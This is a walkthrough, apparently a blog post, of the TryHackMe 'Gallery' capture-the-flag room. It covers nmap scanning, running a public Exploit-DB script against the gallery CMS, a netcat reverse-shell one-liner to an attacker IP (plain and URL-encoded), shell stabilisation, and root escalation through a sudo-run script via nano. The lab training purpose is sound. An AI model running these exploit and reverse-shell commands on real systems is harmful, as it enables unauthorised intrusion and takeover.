TryHackMe: Gallery
Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Question: How many ports are open?
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.157.45
Question: What’s the name of the CMS?
Answer: S***** I**** G******
I searched for a suitable exploit and found it
Let’s exploit.
Command: locate 50214.py
Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/50214.py
Command: python 50214.py
Get Reverse Shell
Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f
But first let’s encode
Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A
Enter these commands after receiving the Reverse Shell
Command: script /dev/null -c bash
Command: export TERM=xterm
Command: ctrl+z
Command: stty raw -echo ; fg
Command: reset
Let’s enumerate the machine with linpeas.sh.
Here we found the necessary credentials credentials
Let’s change the user.
Command: su mike
Privilege Escalation
Let’s look at the file rootkit.sh
Here we can use nano to get a shell. Let’s take a look at this
Command: sudo -u root /bin/bash /opt/rootkit.sh
Command: read
Command: CTRL+R
Command: CTRL+X
Command: reset; sh 1>&0 2>&0
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
